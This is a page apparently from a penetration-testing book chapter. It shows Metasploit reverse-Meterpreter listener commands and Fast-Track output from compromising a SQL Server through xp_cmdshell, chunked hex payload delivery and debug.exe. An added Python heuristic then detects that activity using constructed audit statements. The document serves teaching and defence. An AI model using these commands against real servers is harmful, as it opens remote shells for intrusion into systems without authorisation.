256 Chapter 17
Before launching the attack, we need to set up some options through msfconsole. For practice, let's create our own Metasploit listener manually. Fast-Track can set it up for you, but we will be adding the load auto_add_route function within Metasploit so that we can automatically connect to systems on the internal network. We'll create a listener and launch Fast-Track to attack the system.
root@bt:/opt/framework3/msf3# msfconsole
msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 172.16.32.129
LHOST => 172.16.32.129
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > load auto_add_route
[*] Successfully loaded plugin: auto_add_route
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 172.16.32.129:443
[*] Starting the payload handler...
msf exploit(handler) >
With our listener waiting for a connection from our soon-to-be compromised target, we launch Fast-Track. (When the xterm window opens, close it since we already have a listener set up.)
[+] Importing 64kb debug bypass payload into Fast-Track... [+]
[+] Import complete, formatting the payload for delivery.. [+]
[+] Payload Formatting prepped and ready for launch. [+]
[+] Executing SQL commands to elevate account permissions. [+]
[+] Initiating stored procedure: 'xp_cmdshell' if disabled. [+]
[+] Delivery Complete. [+]
Launching MSFCLI Meterpreter Handler
Creating Metasploit Reverse Meterpreter Payload..
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: LHOST=172.16.32.129,LPORT=443
Taking raw binary and converting to hex.
Raw binary converted to straight hex.
[+] Bypassing Windows Debug 64KB Restrictions. Evil. [+]
[+] Sending chunked payload. Number 1 of 9. This may take a bit. [+]
[+] Sending chunked payload. Number 2 of 9. This may take a bit. [+]
. . . SNIP . . .
[+] Conversion from hex to binary in progress. [+]
[+] Conversion complete. Moving the binary to an executable. [+]
[+] Splitting the hex into 100 character chunks [+]
[+] Split complete. [+]
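The Fast-Track output above reveals a recognisable footprint on the SQL Server side: xp_cmdshell is switched on through sp_configure, a hex-encoded binary is appended to a file in 100-character chunks, and debug.exe is run to rebuild it. The following detection heuristic is an added example and is not code from the book or from Fast-Track; it runs over constructed T-SQL statements shaped like what a SQL Server audit trace would record, and the session ids, file path and hex fragments are made up.

```python
import re

# Constructed sample of T-SQL statements as a SQL Server audit might record them,
# as (session_id, statement). These are made-up lines, not real captured data.
SAMPLE_STATEMENTS = [
    (51, "SELECT name FROM sys.databases"),
    (52, "EXEC sp_configure 'show advanced options', 1; RECONFIGURE"),
    (52, "EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE"),
    (52, "EXEC master..xp_cmdshell 'echo 4d5a90000300000004000000ffff0000b8000000 >> C:\\Temp\\p.hex'"),
    (52, "EXEC master..xp_cmdshell 'echo 0e1fba0e00b409cd21b8014ccd215468697320 >> C:\\Temp\\p.hex'"),
    (52, "EXEC master..xp_cmdshell 'echo 652072756e20696e20444f53206d6f64652e0d0d >> C:\\Temp\\p.hex'"),
    (52, "EXEC master..xp_cmdshell 'debug < C:\\Temp\\p.hex'"),
    (53, "EXEC master..xp_cmdshell 'dir C:\\backups'"),
]

# sp_configure 'xp_cmdshell', 1 turns the procedure on (the step Fast-Track
# reports as "Initiating stored procedure ... if disabled").
ENABLE_RE = re.compile(r"sp_configure\s+'xp_cmdshell'\s*,\s*1\b", re.I)
# Any xp_cmdshell call; the OS command is the quoted argument.
CALL_RE = re.compile(r"xp_cmdshell\s+'(?P<cmd>[^']*)'", re.I)
# "echo <long hex run> >> file": one chunk of a hex-encoded binary being appended.
HEX_APPEND_RE = re.compile(r"echo\s+[0-9a-f]{32,}\s*>>", re.I)
# debug.exe turning the assembled hex back into an executable.
DEBUG_RE = re.compile(r"\bdebug(\.exe)?\b", re.I)

def analyse(statements):
    """Summarise xp_cmdshell activity per session."""
    findings = {}
    for sid, stmt in statements:
        f = findings.setdefault(sid, {"enabled": False, "calls": 0,
                                       "hex_chunks": 0, "debug": False})
        if ENABLE_RE.search(stmt):
            f["enabled"] = True
        m = CALL_RE.search(stmt)
        if m:
            f["calls"] += 1
            cmd = m.group("cmd")
            if HEX_APPEND_RE.search(cmd):
                f["hex_chunks"] += 1
            if DEBUG_RE.search(cmd):
                f["debug"] = True
    return findings

def suspicious_sessions(statements, chunk_threshold=3):
    """Sessions that enabled xp_cmdshell and then used it, or that appended
    at least chunk_threshold hex chunks (a binary arriving in pieces)."""
    return sorted(sid for sid, f in analyse(statements).items()
                  if (f["enabled"] and f["calls"]) or f["hex_chunks"] >= chunk_threshold)

if __name__ == "__main__":
    for sid, f in analyse(SAMPLE_STATEMENTS).items():
        print(sid, f)
    print("suspicious:", suspicious_sessions(SAMPLE_STATEMENTS))
```

Session 53 calls xp_cmdshell once without enabling it and stays below the chunk threshold, so it is reported in the summary but not flagged; tune chunk_threshold to the volume of legitimate xp_cmdshell use in your environment.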